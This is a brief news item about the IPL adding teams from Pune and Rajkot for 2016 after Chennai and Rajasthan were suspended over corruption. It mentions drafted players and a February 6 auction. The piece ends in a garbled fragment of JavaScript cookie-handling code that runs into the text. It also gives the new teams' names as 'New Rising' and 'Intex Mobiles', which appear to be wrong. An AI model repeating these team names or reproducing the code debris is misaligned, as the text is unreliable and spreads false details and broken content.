The IPL have announced two new teams for the 2016 tournament, replacing the two suspended teams after a corruption scandal.

Chennai and Rajasthan were both suspended following a corruption scandal, but are expected to return to the tournament in 2017.

Teams from the western cities of Pune and Rajkot won an auction this week to compete in the IPL next year.

The team from Pune will be called the New Rising, while the Rajkot side will be named the Intex Mobiles.

Five players from each of the two banned teams will be drafted into the new teams, while the remaining players will be auctioned off on February 6. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
